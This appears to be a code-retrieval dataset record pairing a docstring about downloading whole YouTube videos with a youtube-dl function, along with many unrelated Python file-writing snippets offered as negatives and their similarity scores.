to file:\", out_fname)\n pickle.dump(out_dict, open(out_fname, \"wb\"))", "def write_to_file(self) -> None:\n with open(self.output_file_path, mode='w', newline='') as csv_file:\n tweet = ['id', 'created_time', 'text']\n writer = csv.DictWriter(csv_file, fieldnames=tweet)\n writer.writeheader()\n for tweet in self.clean_unique_tweets:\n try:\n writer.writerow(tweet)\n except:\n pass\n print(\"Tweets written to a file\")", "def generateTruths(self, cont):\n truthf = self.outdir + \"/tracks.csv\"\n old = os.dup(1)\n sys.stdout.flush()\n os.close(1)\n os.open(truthf, os.O_WRONLY | os.O_CREAT)\n cont.printallTruths()\n sys.stdout.flush()\n os.close(1)\n os.dup(old)\n os.close(old)", "def write_to_file_ann(self) -> None:\n with open(self.output_file_path, mode='w', newline='') as csv_file:\n tweet = ['id', 'created_time', 'text']\n writer = csv.DictWriter(csv_file, fieldnames=tweet)\n writer.writeheader()\n for tweet in self.unique_tweets:\n try:\n writer.writerow(tweet)\n except:\n pass\n print(\"Tweets written to a file\")", "def write(lst):\n # TODO", "def produce_solution(y):\n\n with open('out.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', lineterminator=\"\\n\")\n writer.writerow(['id', 'y'])\n for i in range(y.shape[0]):\n writer.writerow([i, y[i]])", "def savepotentialtest(pot, xx, path):\n potential = []\n coordinates = []\n for ii in range(0, len(pot)):\n coordinates.append(xx[ii])\n potential.append(pot[ii])\n np.savetxt(path, np.transpose([coordinates, potential]))", "def write_defined_phase(ct, te, del_phi_phase_defined):\n\tcsvfile = \"../output/defined_phase.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in del_phi_phase_defined:\n\t\t\twriter.writerow([val]) \n\tcsvfile = \"../output/defined_phase_time.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in te:\n\t\t\twriter.writerow([val]) \n\tcsvfile = \"../output/time.txt\"\n\twith open(csvfile, \"w\") as output:\n\t\twriter = csv.writer(output, lineterminator='\\n')\n\t\tfor val in ct:\n\t\t\twriter.writerow([val])", "def save_done_file(outdir, filename=None):\n time_tag = current_time_str()\n if filename == None:\n filename = f\"DONE_{time_tag}.txt\"\n outfn = os.path.join(outdir, filename)\n with open(outfn, \"w\") as outf:\n outf.write(f\"DONE at {time_tag}\\n\")", "def save_solrad_to_HELP(filename, years, precip, city, lat):\n root, ext = osp.splitext(filename)\n filename = filename if ext == '.D13' else filename + '.D13'\n\n fheader = format_weather_header_for_HELP(3, 2, city, lat)\n fdata = format_timeseries_for_HELP(years, precip, '{0:>5}', '{0:>6.2f}')\n save_content_to_csv(filename, fheader + fdata)", "def save_solrad_to_HELP(filename, years, precip, city, lat):\n root, ext = osp.splitext(filename)\n filename = filename if ext == '.D13' else filename + '.D13'\n\n fheader = format_weather_header_for_HELP(3, 2, city, lat)\n fdata = format_timeseries_for_HELP(years, precip, '{0:>5}', '{0:>6.2f}')\n save_content_to_csv(filename, fheader + fdata)", "def save_list(lines, filename):\n data = '\\n'.join(lines)\n file = open(filename, 'w')\n file.write(data)\n file.close()", "def write_telluric_transmission_to_file(wls,T,outpath):\n import pickle\n print('------Saving teluric transmission to '+outpath)\n with open(outpath, 'wb') as f: pickle.dump((wls,T),f)", "def __writeToFile(self, filePath, lst): \n \n if not self.outDir is None: \n filePath = os.path.join(self.outDir, filePath) \n \n open(filePath,'a').writelines(lst)", "def makeSpkSetupFile(leapSecondFilePath, outputPath):\n\n # If the file already exists, delete it and rewrite it.\n if os.path.exists(outputPath):\n os.remove(outputPath)\n\n# print 'Generating LRONAC compatible .pvl file ' + halfResFilePath\n f = open(outputPath, 'w')\n f.write(\"\\\\begindata\\n\")\n f.write(\"INPUT_DATA_TYPE = 'STATES'\\n\")\n f.write(\"OUTPUT_SPK_TYPE = 13\\n\")\n f.write(\"OBJECT_ID = -85\\n\") # LRO\n f.write(\"CENTER_ID = 301\\n\") # Moon\n f.write(\"REF_FRAME_NAME = 'J2000'\\n\")\n f.write(\"PRODUCER_ID = 'Lronac Pipeline'\\n\")\n f.write(\"DATA_ORDER = 'epoch x y z vx vy vz'\\n\")\n f.write(\"DATA_DELIMITER = ','\\n\")\n f.write(\"LEAPSECONDS_FILE = '\" + leapSecondFilePath + \"'\\n\")\n f.write(\"LINES_PER_RECORD = 1\\n\")\n f.write(\"TIME_WRAPPER = '# ETSECONDS'\\n\")\n #f.write(\"EPOCH_STR_LENGTH = 16\\n\")\n f.write(\"INPUT_DATA_UNITS = ('ANGLES=DEGREES' 'DISTANCES=km')\\n\")\n f.write(\"POLYNOM_DEGREE = 11\\n\")\n f.write(\"SEGMENT_ID = 'SPK_STATES_13'\\n\")\n# f.write(\"INPUT_DATA_FILE = 'spkDataFile.txt'\")\n# f.write(\"OUTPUT_SPK_FILE = '/home/smcmich1/testSpkFile.bsp'\")\n f.write(\"\\\\begintext\\n\")\n f.close()", "def newtwogfile(ntf_twogs):\n outfile = open(\"Twogs.txt\", \"w\")\n for x in ntf_twogs:\n outfile.write(\"%s\\n\" % x)\n outfile.close()", "def write_file(self, lst_of_palidroms: list, result_file: str):\n with open(result_file, 'w', encoding='utf-8', errors='ignore') as result:\n for word in lst_of_palidroms:\n result.write(word + '\\n')", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def save_log(fname, end_loss, end_l2_loss, t_time, rewards=None):\n # write summary of logs, and the parameters used\n with open(fname + \".json\", \"wt\") as f:\n j = {\n # data params\n 'J': J,\n 'T': T,\n 'num_features': num_features,\n 'R': R_TOTAL,\n 'weights_file': WEIGHTS_FNAME,\n # model hyperparams\n 'epochs': args.epochs,\n 'layers': N_IDEN_PROB,\n 'eta': args.eta,\n # misc params\n 'seed': args.seed,\n # end results\n 'runtime': t_time,\n 'end_loss': float(end_loss),\n 'end_l2_loss': float(end_l2_loss),\n }\n\n if args.test:\n j['test_file'] = args.test\n\n if args.rand:\n j['device'] = 'gpu' if args.cuda else 'cpu'\n\n json.dump(j, f, indent=4, separators=(',', ': '))\n\n if rewards is not None:\n with open(fname + \".txt\", \"wt\") as f:\n np.savetxt(f, np.expand_dims(rewards, axis=0), fmt=\"%.15f\", delimiter=\" \")", "def outputFunc(filename, resultList):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n for i in range(len(resultList)):\n print resultList[0]\n writer.writerow(resultList[i])\n \n finally:\n f.close()", "def create_activity(self, f_output='activity.txt'):\n list_tuple = []\n epoch = datetime.datetime.utcfromtimestamp(0)\n count_outside = 0\n for bot_id in range(0,5):\n print bot_id\n filename = \"retweeters_%d_backup.csv\" % bot_id\n path_to_file = self.dir_name + \"/\" + filename\n f = open(path_to_file, 'r')\n for line in f:\n # Discard tweet_id (first element) and newline (last element)\n list_retweeter_time = line.split(',')[1:-1]\n if len(list_retweeter_time) != 0:\n idx = 0\n while idx < len(list_retweeter_time):\n retweeter_id = list_retweeter_time[idx]\n if retweeter_id in self.map_userid_number:\n retweeter_num = self.map_userid_number[retweeter_id]\n outside = 0\n else:\n retweeter_num = -1\n outside = 1\n count_outside += 1\n idx += 1\n # year-month-day-hour-min-second (UTC - 4)\n tweet_time = list_retweeter_time[idx]\n dt_local = datetime.datetime.strptime(tweet_time, '%Y-%m-%d-%H-%M-%S')\n dt_utc = dt_local + datetime.timedelta(hours=4)\n seconds = (dt_utc - epoch).total_seconds()\n list_tuple.append( (seconds,retweeter_num,outside) )\n idx += 1\n list_tuple.sort()\n f_write = open(f_output, 'w')\n for t in list_tuple:\n f_write.write(\"%d %d %d\\n\" % (t[0], t[1], t[2]))\n f_write.close()\n print \"Total number of retweets from outside network = %d\" % count_outside", "def make_submission(y_predict, user_movie_ids, file_name='submission',\n date=True):\n\n # Naming the file\n if date:\n file_name = '{}_{}'.format(file_name, time.strftime('%d-%m-%Y_%Hh%M'))\n\n file_name = '{}.txt'.format(file_name)\n\n # Writing into the file\n with open(file_name, 'w') as handle:\n handle.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for (user_id, movie_id), prediction in zip(user_movie_ids,\n y_predict):\n\n if np.isnan(prediction):\n raise ValueError('The prediction cannot be NaN')\n line = '{:d}_{:d},{}\\n'.format(int(user_id), int(movie_id), prediction)\n handle.write(line)\n return file_name", "def Save_Fastas2(UniprotIDs):\r\n file=open(\"../Data/Negative_cases/negative_cases.fasta\",\"w\")\r\n for ID in UniprotIDs:\r\n data=urllib.request.urlopen(\"http://www.uniprot.org/uniprot/%s.fasta\" %ID)\r\n f=data.readlines()\r\n for lines in f:\r\n file.write(str(lines))\r\n #help(data)\r\n file.close()", "def generate_report(check_info_list, to_path):\n # 1.generate info list to dictionary structure\n check_result_data_list = []\n for check_info in check_info_list:\n check_result_data = OrderedDict()\n check_result_data[\"region\"] = check_info.region\n check_result_data[\"version\"] = check_info.version\n\n check_result_data[\"check_message\"] = check_info.detail_info_list\n check_result_data[\"check_state\"] = check_info.state\n\n check_result_data_list.append(check_result_data)\n # 2.sort data list\n check_result_data_list.sort(key=lambda d: d['version'])\n check_result_data_list.sort(key=lambda d: d['region'])\n # check_result_data_list.sort(key=lambda d: d['check_state'])\n # 3.save js check_report\n Util.write_to_js_file(to_path, check_result_data_list)", "def write_match(iout, match):\n \n np.savetxt('match_{0:d}.list'.format(iout), match, fmt='%d %d %.4f')", "def mark_tasks(data):\n try:\n i =0\n while i<30:\n new_date = (date.today() + timedelta(days=i)).strftime(\"%d-%m-%Y\")\n if data.get(new_date)==None:\n i+=1\n continue\n \n os.system(\"clear\")\n message = \"\"\" \\t\\t===============Mark tasks ============== \"\"\"\n print(message)\n print(\"\\nAt date: \", new_date)\n new_lst = [[x[0],idx] for idx,x in enumerate(data[new_date]) if x[1]<0]\n\n for j in range(len(new_lst)):\n print(\"\\t-{} {}\".format(j+1, new_lst[j][0]))\n \n if len(new_lst)==0:\n i+=1\n print(\"\\tNo tasks remaining here.\") \n continue\n\n c1 = int(\"0\"+input(\"\\nChoose the task between [{}-{}] to mark as complete. \\nChoose {} or more to goto next date. \\nChoose 0 to terminate: \".format(min(1,len(new_lst)),len(new_lst), len(new_lst)+1)))\n \n if c1==0:\n break\n elif c1>len(new_lst):\n i+=1\n continue\n \n # c2 = int(input(\"\\nChoose the task between [1-{}] to mark as complete: \".format(len(new_lst))))\n \n data[new_date][new_lst[c1-1][1]][1]*=-1\n print(\"\\n[$$$]Marked as complete!!!\\n\")\n c2 = int(\"0\"+input(\"Mark more here? y(0), n(anything else): \"))\n if c2!=0:\n i+=1\n # json.dump(data,open(TODO_FILE, \"w+\"))\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n except :\n print(\"Some error occurred\")\n finally:\n write_file(data)", "def createPageTimeFile(pages,domain):\n filename = domain+'_pageLoads.csv'\n textfile = file(filename,'wt')\n \n for p in pages:\n try:\n timeofrequest = datetime.today()\n load_time = str(pageLoad.getResponseTime(p))\n results = p + ',' + load_time + ',' + str(timeofrequest)\n print results\n textfile.write(results+'\\n')\n except NameError:\n print 'error with URL, ' + p\n \n textfile.close()\n return filename", "def save_to_file(todoList, doneList):\n\n filePath = os.path.expanduser('~/todoSave')\n f = open(filePath, 'w+')\n # wipe the old save file\n f.truncate(0)\n\n\n obj = {\"todo\": todoList, \"done\": doneList}\n f.write(json.dumps(obj, indent=4))", "def success_callback(self):\n temp_schedule = self.run_dir / \"SLABSurfaceTemps.txt\"\n if temp_schedule.exists():\n with open(self.idf.idfname, \"a\") as outfile:\n with open(temp_schedule) as infile:\n next(infile) # Skipping first line\n next(infile) # Skipping second line\n for line in infile:\n outfile.write(line)\n # invalidate attributes dependant on idfname, since it has changed\n self.idf._reset_dependant_vars(\"idfname\")\n self.cleanup_callback()", "def make_times(night, runs, observatory, times, full, instrument, okwrite):\n\n # use this to check times are vaguely right. time of runs\n # must lie between 06.00 local time on date corresponding to\n # start of night date and 1.5 days later. Has picked up a\n # few erroneously dated nights on the TNT.\n mjd_ref = Time(night).mjd - observatory.lon.degree/360 + 0.25\n\n tdata = {}\n with open(times if okwrite else os.devnull,'w') as tout:\n for run in runs:\n if full:\n print(f'Analysing times for run {run}')\n dfile = os.path.join(night, run)\n try:\n ntotal = 0\n if instrument == 'HiPERCAM':\n rtime = hcam.hcam.Rtime(dfile)\n else:\n rtime = hcam.ucam.Rtime(dfile)\n\n # Find first good time, has to roughly match the start\n # date of the night because some times can just be\n # junk\n not_alerted = True\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n expose = 1000000\n for tmid,texp,tiflag in tinfo:\n expose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n expose = round(time.expose,3)\n\n if instrument == 'HiPERCAM' or tflag:\n mjd_start = time.mjd\n tdelta = mjd_start-mjd_ref\n if tdelta > 0 and tdelta < 1.5:\n ts = Time(mjd_start, format=\"mjd\", precision=2)\n ut_start = ts.hms_custom\n n_start = n+1\n if expose >= 0 and expose < 2000:\n break\n elif not_alerted and (tdelta < 0 or tdelta > 1.5):\n # maximum one warning per run\n not_alerted = False\n print(f' Bad time: tdelta = {tdelta} < 0 or > 1.5 on time {n} of {dfile}')\n else:\n ntotal = 0\n raise hcam.HipercamError(f'No good times found in {dfile}')\n\n # Find last good time. First we just go for times near the\n # end of the run. Failing that, we try again from the start,\n # to account for runs with time stamp issues.\n if instrument == 'HiPERCAM':\n nback = 4\n elif rtime.header['MODE'] == 'DRIFT':\n # ultracam or hipercam\n win = rtime.win[0]\n nyu = win.ny*rtime.ybin\n nback = int((1033/nyu + 1) / 2) + 3\n elif rtime.header['MODE'] == 'UDRIFT':\n # ultraspec\n win = rtime.win[0]\n nyu = win.ny*rtime.ybin\n nback = int((1037/nyu + 1) / 2) + 3\n else:\n # non drift mode\n nback = 4\n\n if instrument == 'HiPERCAM':\n ntotal = rtime.ntotal()\n else:\n nbytes = os.stat(dfile + '.dat').st_size\n ntotal = nbytes // rtime.framesize\n\n if instrument != 'HiPERCAM' and ntotal > 20000:\n # this is a risk-reducing strategy in case the end\n # of a long ultracam or ultraspec run is\n # corrupt. Better to look at more than the\n # necessary number of frames if it prevents us\n # from having to wind through the whole lot.\n nback = max(nback, 500)\n\n # next statement basically resets the frame\n # we are on\n nreset = max(1, ntotal - nback)\n rtime.set(nreset)\n\n flast = False\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n nexpose = 1000000\n for tmid,texp,tiflag in tinfo:\n nexpose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n nexpose = round(time.expose,3)\n\n if instrument == 'HiPERCAM' or tflag:\n mjd = time.mjd\n if mjd >= mjd_start and mjd < mjd_start + 0.4:\n mjd_end = mjd\n ts = Time(mjd_end, format=\"mjd\", precision=2)\n ut_end = ts.hms_custom\n n_end = nreset + n\n if nexpose < 2000:\n expose = max(expose, nexpose)\n flast = True\n\n if not flast:\n # no good time found near end. There must be\n # one or we wouldn't get to this point, so\n # grind it out the hard way by going through\n # the whole run, which can be slow.\n rtime.set()\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n nexpose = 1000000\n for tmid,texp,tiflag in tinfo:\n nexpose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n nexpose = round(time.expose,3)\n\n if tflag:\n mjd = time.mjd\n if mjd >= mjd_start and mjd < mjd_start + 0.4:\n mjd_end = mjd\n ts = Time(mjd_end, format=\"mjd\", precision=2)\n ut_end = ts.hms_custom\n n_end = n + 1\n if nexpose < 2000:\n expose = max(expose, nexpose)\n\n nok = n_end-n_start+1\n if n_end > n_start:\n cadence = round(86400*(mjd_end-mjd_start)/(n_end-n_start),3)\n tdata[run] = [ut_start,mjd_start,ut_end,mjd_end,cadence,expose,nok,ntotal]\n else:\n cadence = 'UNDEF'\n tdata[run] = [ut_start,mjd_start,ut_end,mjd_end,'',expose,nok,ntotal]\n tout.write(f'{run} {ut_start} {mjd_start} {ut_end} {mjd_end} {cadence} {expose} {nok} {ntotal}\\n')\n\n except hcam.ucam.PowerOnOffError:\n # Power on/off\n tdata[run] = ['power-on-off',]\n tout.write(f'{run} power-on-off\\n')\n if full: print(f'{run} was a power-on or -off')\n\n except hcam.HipercamError:\n # No good times\n tdata[run] = ['','','','','','',0,ntotal]\n tout.write(f'{run} UNDEF UNDEF UNDEF UNDEF UNDEF UNDEF 0 {ntotal}\\n')\n if full:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1)\n traceback.print_exc()\n print(f'No good times found for {run}; ntotal = {ntotal}')\n\n except:\n # some other failure\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1)\n traceback.print_exc()\n print(\"Problem on run = \", dfile)\n\n # Load of undefined\n tdata[run] = 8*['']\n tout.write(f'{run} {\" \".join(8*[\"UNDEF\"])}\\n')\n\n if okwrite:\n print('Written timing data to',times)\n\n return tdata", "def genScheduleCSV():\r\n try: \r\n printSchedule()\r\n save_class_list()\r\n print(\"\\nSchedule generated, check working directory\")\r\n except Exception as e:\r\n print(\"Exception found\" + str(e))", "def video_times():\n p = parse_cmdline(get_parser=get_parser_times)\n log.setup_main_handler(\n mods=(\"fogtools\", \"typhon\", \"fogpy\", \"sattools\", \"fcitools\", \"satpy\",\n \"pyresample\"),\n level=logging.DEBUG)\n vis.show_video_abi_glm_times(\n start_date=p.start_time,\n end_date=p.end_time,\n img_out=p.filename_pattern_image,\n vid_out=p.filename_pattern_video,\n out_dir=p.outdir,\n sector=p.sector,\n area=p.area)\n print(\"Files written to:\", p.outdir)", "def write_list(args, file_list):\n if not args.listfile.endswith(\".txt\"):\n args.listfile += \".txt\"\n outputfile = open(args.listfile, 'w')\n for name in file_list:\n outputfile.write(name)\n outputfile.write(\"\\n\")\n outputfile.close()", "def create_file_output(self, results):\n for key, value in results.table_output.items():\n name_timestamp = key.split('&')\n _name = name_timestamp[0]\n timestamp = name_timestamp[1]\n file_name = output_file_prefix + \"-\" + _name + \".csv\"\n if file_name not in self.file_creation_set:\n self._header_written = False\n self.file_creation_set.update([file_name])\n for row in value:\n with open(file_name, 'a+') as file_to_write:\n row.update({'Timestamp': timestamp})\n _keys = row.keys()\n file_output = csv.DictWriter(file_to_write, _keys)\n if not self._header_written:\n file_output.writeheader()\n self._header_written = True\n file_output.writerow(row)\n file_to_write.close()\n return results", "def save_file(self):\n f = open(self._file_name, \"w\")\n try:\n for rental in self.list:\n rental_str = self.obj_to_string(rental)\n f.write(rental_str)\n f.close()\n except Exception as e:\n raise e", "def produce_submission(ids, y, filename):\n final_submission = pd.DataFrame({'Id': ids, 'SalePrice': y})\n final_submission.to_csv(f'../Submissions/{filename}.csv', index=False)", "def saveauto(self):\n self.inp.getedge()\n ss=ss=strftime(\"_%Y-%m-%d_%H:%M:%S\", gmtime())\n fn=os.environ['VMEWORKDIR'] +\"/WORK/phases/\"+self.name+ss+self.inp.edge+\"_\"+self.inp.inpnum+\"_\"+self.inp.ctpnum+\".ps\"\n rc=self.c1.postscript(file=fn)\n if rc is not '':\n MywError(errmsg=\"File \"+fn+\" cannot be created.\")\n print \"rc=\",rc,len(rc)\n else:\n print \"File \",fn, \" saved.\"", "def save_lidar(data, data_directory, loc):\n t0 = dt.datetime(1970, 1, 1) + dt.timedelta(seconds=data[0][1])\n t0_day = dt.datetime(t0.year, t0.month, t0.day)\n secs = (t0_day - dt.datetime(1970, 1, 1)).total_seconds()\n\n t = [i[1] - secs for i in data]\n meas = [i[2] for i in data]\n try:\n with open(os.path.join(data_directory, loc, 'lidar', t0_day.strftime('%Y-%m-%d.txt')), 'a+') as f:\n for i, j in zip(t, meas):\n f.write(f'{i} {j}\\n')\n except FileNotFoundError:\n print(\"Data directory is bad. Try again. \")\n sys.exit(0)", "def write_file(self, psm_list: PSMList):\n file = open(self.filename, \"wb\")\n with Progress(disable=not self.show_progressbar) as progress:\n with MzIdentMLWriter(file, close=True) as writer:\n writer.controlled_vocabularies()\n writer.provenance(\n software={\n \"name\": \"psm_utils\",\n \"uri\": \"https://github.com/compomics/psm_utils\",\n \"version\": __version__,\n }\n )\n writer.register(\"SpectraData\", 1)\n writer.register(\"SearchDatabase\", 1)\n writer.register(\"SpectrumIdentificationList\", 1)\n writer.register(\"SpectrumIdentificationProtocol\", 1)\n\n proteins = set()\n peptide_ids = set()\n peptide_evidence_ids = set()\n\n proteins = {\n prot\n for prot_list in list(psm_list[\"protein_list\"])\n if prot_list\n for prot in prot_list\n }\n\n spec_id_dict = psm_list.get_psm_dict()\n task1 = progress.add_task(\"[cyan]Writing Proteins to mzid\", total=len(proteins))\n task2 = progress.add_task(\n \"[cyan]Writing Peptide and PeptideEvidence items\",\n total=len(psm_list),\n )\n task3 = progress.add_task(\n \"[cyan]Writing SpectrumIdentificationResults\",\n total=len(psm_list),\n )\n\n with writer.sequence_collection():\n for prot in proteins:\n writer.write_db_sequence(prot, None, id=prot, params=[])\n progress.update(task1, advance=1)\n for psm in psm_list:\n peptide = psm[\"peptidoform\"]\n if peptide not in peptide_ids:\n writer.write_peptide(**self._create_peptide_object(peptide))\n peptide_ids.add(peptide)\n\n if psm[\"protein_list\"]:\n for protein in psm[\"protein_list\"]:\n peptide_evidence_id = (\n f\"PeptideEvidence_{peptide.proforma}_{protein}\"\n )\n if peptide_evidence_id not in peptide_evidence_ids:\n peptide_evidence_ids.add(peptide_evidence_id)\n writer.write_peptide_evidence(\n peptide_id=\"Peptide_\" + peptide.proforma,\n db_sequence_id=protein,\n id=peptide_evidence_id,\n start_position=None,\n end_position=None,\n is_decoy=psm[\"is_decoy\"],\n )\n progress.update(task2, advance=1)\n with writer.analysis_collection():\n writer.SpectrumIdentification([1], [1]).write(writer)\n\n with writer.analysis_protocol_collection():\n writer.spectrum_identification_protocol() # build without?\n\n with writer.data_collection():\n spectra_data, spectra_data_id_dict = self._transform_spectra_data(\n spec_id_dict=spec_id_dict\n )\n writer.inputs(\n source_files=[],\n # # if fasta file is given, we can parse here and add protein information\n # search_databases=transform_search_database(),\n spectra_data=spectra_data,\n )\n\n with writer.analysis_data():\n with writer.spectrum_identification_list(id=1):\n for collection in spec_id_dict.keys():\n for run in spec_id_dict[collection].keys():\n spectra_data_id = spectra_data_id_dict[\n \"/\".join(filter(None, [collection, run]))\n ]\n for spec_id in spec_id_dict[collection][run].keys():\n identified_psms = spec_id_dict[collection][run][spec_id]\n writer.write_spectrum_identification_result(\n **self._transform_spectrum_identification_result(\n spec_id, identified_psms, spectra_data_id\n )\n )\n progress.update(\n task3,\n advance=len(spec_id_dict[collection][run][spec_id]),\n )", "def make_log():\n log_file = os.path.join(phys_dir,'ge_phys2bids_'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")+'.log')\n with open(log_file,'w') as log:\n log.write('-------- GE phys2bids --------\\n\\n')\n log.write('DICOM directory: %s\\n'%dcm_dir)\n log.write('Physiology directory: %s\\n'%phys_dir)\n log.write('Output directory: %s\\n\\n'%out_dir)\n log.write('%d EPI files were found\\n\\n'%len(dcm_dict))\n for rn in dcm_dict.keys():\n log.write('------------------------------\\n')\n log.write('%s\\n'%dcm_dict[rn]['out_name'])\n log.write('Start time: %s\\n'%dcm_dict[rn]['start_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('End time: %s\\n'%dcm_dict[rn]['end_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('PPG file: %s\\n'%dcm_dict[rn]['ppg_file'])\n log.write('Respiration file: %s\\n'%dcm_dict[rn]['resp_file'])\n log.write('ECG file: %s\\n'%dcm_dict[rn]['ecg_file'])\n log.write('------------------------------\\n\\n')", "def save_specs(self, filename):\n pass", "def save_specs(self, filename):\n pass" ]
[ "0.5606279", "0.54776007", "0.5325414", "0.527905", "0.5232085", "0.5220749", "0.5214294", "0.5194305", "0.5157583", "0.5149266", "0.51426595", "0.51125914", "0.50968117", "0.50955224", "0.50598377", "0.50564367", "0.5056409", "0.5055913", "0.50520384", "0.5035325", "0.5033409", "0.5027646", "0.50266147", "0.5026436", "0.5022758", "0.5014538", "0.49741006", "0.49613667", "0.49586824", "0.49513194", "0.4944087", "0.49381602", "0.49261457", "0.49000242", "0.48933017", "0.48906934", "0.48898938", "0.48813817", "0.4874133", "0.48721597", "0.48680714", "0.48677072", "0.48579812", "0.48568517", "0.4849215", "0.48474246", "0.4843157", "0.48410824", "0.48304164", "0.48284736", "0.48059696", "0.4794929", "0.47929558", "0.47905436", "0.47886503", "0.47851858", "0.4782985", "0.47818473", "0.47775805", "0.47760293", "0.47706646", "0.47671488", "0.4761552", "0.47590894", "0.47587916", "0.47575358", "0.47551662", "0.47491494", "0.47491494", "0.4747236", "0.47442716", "0.47352776", "0.4733876", "0.47337598", "0.47211617", "0.47181314", "0.47174343", "0.4715309", "0.47124705", "0.47123492", "0.4702876", "0.46992984", "0.46982703", "0.46956497", "0.4689761", "0.46885684", "0.46882904", "0.4686545", "0.46833786", "0.46799856", "0.46748278", "0.46697903", "0.46668133", "0.46634257", "0.4663174", "0.4661416", "0.46560308", "0.46541923", "0.46516296", "0.46516296" ]
0.7020351
0
Function that downloads a whole video when no interval is supplied Downloaded to the same place where yt_vids is saved to (from save_link_time func)
def download_whole(no_interval): print(os.getcwd()) SAVE_PATH = 'tmp' ydl_opts = {"nocheckcertificate": True, "noplaylist": True, 'outtmpl': f'{SAVE_PATH}/%(title)s.%(ext)s'} with youtube_dl.YoutubeDL(ydl_opts) as ydl: for video in range(len(no_interval)): try: ydl.download([no_interval[video]]) except youtube_dl.utils.ExtractorError or youtube_dl.utils.DownloadError: print(f"Couldn't download {no_interval[video]}") continue
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download(df_shorter,folderName):\n os.mkdir(str(folderName))\n path = os.getcwd()+'\\\\'+str(folderName)+'\\\\'\n #add column with video link generated from IDs\n df_shorter['urls'] = df_shorter['id'].apply(lambda x: generateLinkFromId(x))\n vid_dl = []\n i = 1\n for url in df_shorter['urls']:\n if url != False:\n name = str(i)+'.mp4'\n vid_dl.append(wget.download(url,path+name))#retrun the path of the saved video\n i = i+1\n return vid_dl", "def download_videos(download_limit=6):\n videos = []\n for fname in os.listdir('yt_api_data'):\n videos += load_video_data(fname)\n vids_downloaded = 0\n excluded_vids = get_excluded_videos()\n for video_id, title in videos:\n if download_limit != 'all' and vids_downloaded == download_limit:\n break\n title = title.replace(' ', '_')\n mkv_path = \"videos/\" + title + \".mkv\"\n mp4_path = \"videos/\" + title + \".mp4\"\n download_fpath = \"videos/\" + title\n if not check_excluded_list(excluded_vids, title) and not os.path.isfile(mkv_path) and not os.path.isfile(mp4_path):\n print(colored(str(vids_downloaded + 1) + \": \", \"yellow\") + colored(video_id + \" downloading: \" + download_fpath, \"green\"))\n command_prefix = \"youtube-dl -o \" + download_fpath\n if video_id[0] == '-': \n os.system(command_prefix + \" -- \" + video_id)\n else:\n os.system(command_prefix + \" \" + video_id)\n vids_downloaded += 1\n else:\n print(colored(\"skipping download: \" + title + \"with youtube_id: \" + video_id, \"yellow\"))", "def download_videos(blink, save_dir=\"/media\"):\n blink.download_videos(save_dir, since=get_date())", "def download_cdn_videos(filenames,sub_urls,handout_urls,video_urls, target_dir):\n \"\"\" using a simple file downloader \"\"\"\n for i, v in enumerate(video_urls):\n filename_prefix = str(i+1).zfill(2) + '-'\n #original_filename = v.rsplit('/', 1)[1]\n video_filename = filename_prefix + filenames[i] + '.mp4'\n sub_filename = filename_prefix + filenames[i] + '.srt'\n handout_filename = filename_prefix + filenames[i] + '.srt'\n video_path = os.path.join(target_dir, video_filename)\n sub_path = os.path.join(target_dir, sub_filename)\n handout_path = os.path.join(target_dir, handout_filename)\n #print('[debug] GET %s' % v)\n print('[download] Destination: %s' % video_path)\n v = quote(v,safe=\":/\")\n if len(v) != YOUTUBE_VIDEO_ID_LENGTH:\n req = Request(v) \n try:\n video = urlopen(v)\n fileSize = int(video.headers['content-length'])\n finish = False\n existSize = 0\n if os.path.exists(video_path):\n output = open(video_path,\"ab\")\n existSize = os.path.getsize(video_path)\n #If the file exists, then only download the remainder\n if existSize < fileSize:\n #print(\"[debug] bytes range is: %s-%s\" % (existSize,fileSize))\n req.headers[\"Range\"]= \"bytes=%s-%s\" % (existSize,fileSize)\n video = urlopen(req)\n else:\n finish = True\n else:\n output = open(video_path,\"wb\")\n if finish == False:\n file_size_dl = existSize\n block_sz = 262144\n while True:\n buffer = video.read(block_sz)\n if not buffer:\n break\n \n file_size_dl += len(buffer)\n output.write(buffer)\n status = r\"%10d [%3.2f%%]\" % (file_size_dl, file_size_dl * 100. / fileSize)\n status = status + chr(8)*(len(status)+1)\n sys.stdout.write(status)\n sys.stdout.flush()\n \n output.close()\n\n except URLError as e:\n print(\"[warning]error: %r when downloading %s\" % (e.reason,v) )\n\n else:\n download_youtube_video(v,video_path)\n \n if sub_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(sub_path):\n subs_string = 